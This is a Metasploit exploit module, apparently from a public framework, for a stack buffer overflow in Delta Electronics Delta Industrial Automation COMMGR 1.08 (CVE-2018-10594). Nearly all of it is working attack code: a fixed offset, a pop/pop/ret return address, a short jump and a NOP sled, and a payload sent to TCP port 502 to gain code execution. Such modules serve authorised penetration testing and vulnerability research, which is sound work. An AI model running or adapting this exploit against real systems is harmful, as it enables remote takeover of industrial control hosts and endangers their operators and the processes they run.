Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
14
      'Description'    => %q{
15
        This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
16
        Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
17
        crafted packets. This module has been tested successfully on Delta Electronics Delta
18
        Industrial Automation COMMGR 1.08 over
19
          Windows XP SP3,
20
          Windows 7 SP1, and
21
          Windows 8.1.
22
      },
23
      'Author'         =>
24
        [
25
          'ZDI',        # Initial discovery
26
          't4rkd3vilz', # PoC
27
          'hubertwslin' # Metasploit module
28
        ],
29
      'References'     =>
30
        [
31
          [ 'CVE', '2018-10594' ],
32
          [ 'BID', '104529' ],
33
          [ 'ZDI', '18-586' ],
34
          [ 'ZDI', '18-588' ],
35
          [ 'EDB', '44965' ],
36
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]
37
        ],
38
      'Payload'        =>
39
        {
40
          'Space'          => 640,
41
          'DisableNops'    => true,
42
          'BadChars'       => "\x00"
43
        },
44
      'DefaultOptions' =>
45
        {
46
          'EXITFUNC' => 'thread',
47
        },
48
      'Platform'       => 'win',
49
      'Targets'        =>
50
        [
51
          [ 'COMMGR 1.08 / Windows Universal',
52
            {
53
              'Ret'    => 0x00401e14, # p/p/r COMMGR.exe
54
              'Offset' => 4164
55
            }
56
          ],
57
        ],
58
      'DisclosureDate' => '2018-07-02',
59
      'DefaultTarget'  => 0))
60

61
    register_options(
62
      [
63
        Opt::RPORT(502)
64
      ])
65
  end
66

67
  def exploit
68
    data =  rand_text_alpha(target['Offset'])
69
    data << "\xeb\x27\x90\x90"    # jmp short $+27 to the NOP sled
70
    data << [target.ret].pack("V")
71
    data << make_nops(40)
72
    data << payload.encoded
73

74
    print_status("Trying target #{target.name}, sending #{data.length} bytes...")
75
    connect
76
    sock.put(data)
77
    disconnect
78
  end
79
end
80

81

82